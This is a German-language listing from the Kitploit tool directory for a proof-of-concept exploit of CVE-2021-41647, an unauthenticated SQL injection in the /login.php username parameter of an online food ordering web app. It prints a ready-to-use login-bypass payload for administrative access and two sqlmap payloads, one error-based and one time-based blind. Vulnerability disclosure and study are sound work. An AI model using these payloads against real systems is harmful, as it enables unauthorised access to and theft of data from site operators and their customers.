Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41647 — Proof-of-Concept Exploit für unauthorisierte SQL-Injection in Online-Food-Ordering-Web-App, der Login-Bypass und fehlerbasierte/zeitbasierte Blind-Injection-Techniken demonstriert. | Kitploit
Tools/GitHubGitHub/mobiusbinary/cve-2021-41647
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

Proof-of-Concept Exploit für unauthorisierte SQL-Injection in Online-Food-Ordering-Web-App, der Login-Bypass und fehlerbasierte/zeitbasierte Blind-Injection-Techniken demonstriert.

Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41647

CVE-2021-41647 SQL-Injection in Online-Food-Ordering-Web-App

Die Online-Food-Ordering-Web-App ist anfällig für unauthentifizierte Fehler- und zeitbasierte blinde SQL-Injection-Angriffe. Der username-Parameter auf der /login.php-Seite bereinigt die Benutzereingabe nicht, sodass ein Angreifer den Login mit einer einfachen Bypass-Technik umgehen kann.

Link zur Anwendung

Online-Food-Ordering-Web-App

Betroffene Komponenten und Parameter

URL: /login.php
Parameter: username

POCs

Login-Bypass-Payload

Um den Benutzer-Login zu umgehen und vollständigen administrativen Zugriff zu erhalten, Payload in das username-Eingabefeld: user' or 1=1-- -

SQLMAP-Payloads

Parameter: username (POST-Anfrage) Typ: fehlerbasiert Titel: MySQL >= 5.0 AND fehlerbasiert - WHERE-, HAVING-, ORDER BY- oder GROUP BY-Klausel (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

Typ: zeitbasierte Blind Titel: MySQL >= 5.0.12 AND zeitbasierte Blind (Abfrage SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Falls das POC-Bild unklar ist, klicken Sie bitte auf das GIF, das in einer besseren Auflösung geladen wird.

POC

Entdeckt von

Jason Colyvas
MOBIUSBINARY
20. September 2021

Tool herunterladen